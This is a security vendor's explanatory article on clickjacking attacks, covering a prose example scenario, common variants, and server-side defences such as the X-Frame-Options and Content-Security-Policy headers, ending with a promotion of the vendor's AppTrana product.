What are Clickjacking Attacks? Tips to Prevent Them
Clickjacking attacks trick the user into clicking unintentionally on a webpage element that is invisible or disguised as another element. Since clickjacking attacks do not affect the website per se, businesses might not take these vulnerabilities seriously. However, these attacks affect users and only businesses can protect them through robust clickjacking prevention measures. Businesses that do not take proper preventive measures are essentially risking their brand value and business continuity.
Let us dive into this attack type and understand how to prevent them.
What are Clickjacking Attacks?
In clickjacking attacks, the attacker captures user clicks through UI tricks that make the user believe that they are performing desired actions. These attacks are also known as User Interface (UI) Redressing. A majority of attackers leverage clickjacking vulnerabilities related to HTML iframes and protection methods that focus on preventing page framing.
An example of how clickjacking works in real-life
- The attacker has carefully crafted a website that promises attractive offers/ free gifts.
- In the background, the attacker will check if the user is logged into the banking/ e-commerce site. Using query parameters, the attacker inserts their banking details into the form.
- With the malicious website in the background, the user’s bank transfer page/ e-commerce checkout page is overlaid on it in a fully transparent frame.
- Desired controls such as Confirm Transfer/ Confirm Purchase are aligned with the clickable items that are visible on the malicious site such as Claim Gift/ Claim Offer/ Book Your Free Trip.
- When the user clicks on these items, they are actually confirming the fund transfer or purchase.
- Unaware of the fund transfer or product purchase in the background, the user will be redirected to the page with information on the offer/ free gift.
- This attack cannot be traced back to the attacker since the user performed the actions while being legitimately signed into their banking or e-commerce account.
Types of Clickjacking Attacks
Based on the nature of specific operation: (Few of the variants are listed below)
- Likejacking: To hijack clicks for likes on Facebook and other social media platforms
- Cookiejacking: The attacker gains the ability to perform actions on behalf of the user in the targeted website through access to cookies stored in the browser
- Filejacking: To gain access to local file systems and take any files
- Cursorjacking: To hijack and change the cursor position to any place desired by the user
- Password manager attacks: To deceive password managers and exploit the auto-fill functionality
Based on the type of overlay/ embedding used:
- Complete Transparent Overlay
- Hidden Overlay
- Click Event Cropping
- Rapid Content Replacement
- Drag and Drop
Unaware that they are actually clicking on the target website, users could unknowingly:
- download malware
- visit fraudulent/ malicious web pages
- provide credentials/ sensitive information
- transfer money
- purchase products and so on
A motivated attacker may leverage clickjacking vulnerabilities to:
- harvest login credentials
- spread worms and malware on social media sites
- spread malware in systems and networks through downloads
- promote online scams
- trick users into giving access to local files, password managers, web camera, microphone, etc
Frame Busting is one of the most common client-side methods used in clickjacking prevention. Despite being effective in some cases, this method is error-prone and can be easily bypassed.
Server-side methods are trusted and recommended by security experts for clickjacking protection.
- X-Frame Options
A common server-side method is X-Frame Options. The X-Frame Options HTTP header passed as part of the HTTP response of a webpage, indicates whether or not a browser should be allowed to render a page inside a <frame>, <iframe> or <object> tag.
Three permitted values for the header are:
- DENY: disallows any domain/ site to display the page within a frame
- SAMEORIGIN: allows the current page to be displayed in a frame on another page, but only within the current domain
- ALLOW-FROM *uri*: allows the page to be displayed only in a frame on the specified origins/ in a specified URL
However, the security provided by X-Frame options is limited and is ineffective in multi-domain sites.
- Content Security Policies
Part of the HTML5 standard, the Content-Security-Policy HTTP header enables website authors to whitelist individual domains from which resources can be loaded and pages can be embedded. It provides wider protection than the X-Frame-Options header.
The vulnerability of the website to clickjacking attacks can be gauged using testing. The tester would try to include a sensitive page from the website in an iframe. They will execute code from another server and evaluate if the webpage is vulnerable to clickjacking. They will also test the strength of the anti-clickjacking methods used on the website.
Intuitive and Managed Web Application Security Solution
Given that attackers leverage vulnerabilities in websites to clickjack, deploying a holistic, intelligent, and managed security solution like AppTrana is indispensable.
Clickjacking protection is directly linked to user trust and loyalty. So, businesses must take clickjacking attack prevention seriously and proactively protect their users.